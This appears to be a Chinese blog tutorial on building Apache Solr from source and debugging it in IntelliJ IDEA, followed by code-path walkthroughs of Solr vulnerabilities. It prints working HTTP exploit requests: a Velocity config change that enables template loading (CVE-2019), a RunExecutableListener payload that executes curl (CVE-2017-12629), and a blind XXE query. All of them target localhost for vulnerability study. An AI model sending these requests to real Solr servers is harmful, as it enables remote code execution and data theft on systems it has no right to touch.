solr搭建与idea debug调试

一、环境搭建

1、安装环境

下载ant，http://ant.apache.org/bindownload.cgi，

将其解压至你喜欢的地方（我的是mac环境），然后配置环境变量：vi ~/.bash_profile

export ANT_HOME=/XXX/apache-ant-1.10.8
export PATH=$ANT_HOME/bin:$PATH

使配置生效：source ~/.bash_profile

下载solr，https://lucene.apache.org/solr/downloads.html，下载源码

解压，进入根目录，输入如下命令。

ant ivy-bootstrap 
cd solr
ant server
cd ..
ant idea

可能会失败，多ant几次，还是不行，试试用手机热点，还是不行，设置代理，还是不行，终极办法：

[ivy:retrieve]
[ivy:retrieve] :: problems summary ::
[ivy:retrieve] :::: WARNINGS
[ivy:retrieve] 		[FAILED     ] org.restlet.jee#org.restlet;2.4.0!org.restlet.jar:  (0ms)
[ivy:retrieve] 	==== shared: tried
[ivy:retrieve] 	  /Users/xxx/.ivy2/shared/org.restlet.jee/org.restlet/2.4.0/jars/org.restlet.jar
[ivy:retrieve] 	==== public: tried
[ivy:retrieve] 	  https://repo1.maven.org/maven2/org/restlet/jee/org.restlet/2.4.0/org.restlet-2.4.0.jar
[ivy:retrieve] 		[FAILED     ] org.restlet.jee#org.restlet.ext.servlet;2.4.0!org.restlet.ext.servlet.jar:  (0ms)
[ivy:retrieve] 	==== shared: tried
[ivy:retrieve] 	  /Users/xxx/.ivy2/shared/org.restlet.jee/org.restlet.ext.servlet/2.4.0/jars/org.restlet.ext.servlet.jar
[ivy:retrieve] 	==== public: tried
[ivy:retrieve] 	  https://repo1.maven.org/maven2/org/restlet/jee/org.restlet.ext.servlet/2.4.0/org.restlet.ext.servlet-2.4.0.jar
[ivy:retrieve] 		::::::::::::::::::::::::::::::::::::::::::::::
[ivy:retrieve] 		::              FAILED DOWNLOADS            ::
[ivy:retrieve] 		:: ^ see resolution messages for details  ^ ::
[ivy:retrieve] 		::::::::::::::::::::::::::::::::::::::::::::::
[ivy:retrieve] 		:: org.restlet.jee#org.restlet;2.4.0!org.restlet.jar
[ivy:retrieve] 		:: org.restlet.jee#org.restlet.ext.servlet;2.4.0!org.restlet.ext.servlet.jar
[ivy:retrieve] 		::::::::::::::::::::::::::::::::::::::::::::::
[ivy:retrieve]
[ivy:retrieve] :: USE VERBOSE OR DEBUG MESSAGE LEVEL FOR MORE DETAILS

看上面的报错信息，发现它会在本地shared目录查找相关jar

那就进入https://lucene.apache.org/solr/downloads.html，下载binary版本，然后找到相关jar文件，拷到上面的共享目录，没有目录的话手动创建，再运行相关命令即可。

安装成功后，进入solr/bin，赋权限

chmod a+x solr

启动solr的debug模式：

solr -f -a  "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=56666" -port 58080

56666为调试端口，58080为访问端口，这里就可以访问和调试了。

如有需要一点demo，使用下面命令生成测试数据：

./solr -f -e dih

我们需要箭头处的测试数据路径，由于该命令无法调用调试端口，所以停止服务

./solr stop -p 8983

然后再用debug命令：

solr -f -a  "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=56666" -port 58080 -s "/Users/rym/all/program/projects/openSource/solr-8.5.2/solr/example/example-DIH/solr"

访问网址：

IDEA远程调试，参考https://blog.csdn.net/qq_34101364/article/details/106105712

2、说明

配置文件中，ImplicitPlugins.json 文件中提取插件（可以认为是路由）信息，在solrconfig.xml 里获取插件的配置信息

二、举例

1、CVE-2019

版本：8.1.1

确认开启了至少一个core

先发送设置包，以满足下面poc执行条件

POST /solr/tika/config HTTP/1.1
Host: localhost:58080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost:58080/solr/
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

在IDEA上设置断点：org.apache.solr.handler.SolrConfigHandler#handleRequestBody

跟进：org.apache.solr.handler.SolrConfigHandler.Command#handlePOST

再进入org.apache.solr.handler.SolrConfigHandler.Command#handleCommands

接着进入org.apache.solr.handler.SolrConfigHandler.Command#updateNamedPlugin方法

最终进到addNamedPlugin函数，创建了一个VelocityResponseWriter对象，该对象的 solr.resource.loader.enabled和params.resource.loader.enabled的值设置成了true，该对象的name为velocity。

Velocity是一个基于Java的模板引擎。它允许任何人使用简单但功能强大的模板语言来引用Java代码中定义的对象，模板执行地址：org.apache.solr.response.VelocityResponseWriter#doWrite

2、CVE-2017-12629

POST /solr/atom/config HTTP/1.1
Host: localhost:58080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost:58080/solr/
Content-Type: application/json
Content-Length: 263

{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"curl",
    "dir":"/usr/bin/",
    "args":["http://127.0.0.1:8080"]
  }
}

新版本删除了RunExecutableListener类

3、blind xxe

http://localhost:58080/solr/tika/select?q={!xmlparser v=''}&wt=xml

路径：org.apache.lucene.queryparser.xml.CoreParser#parseXML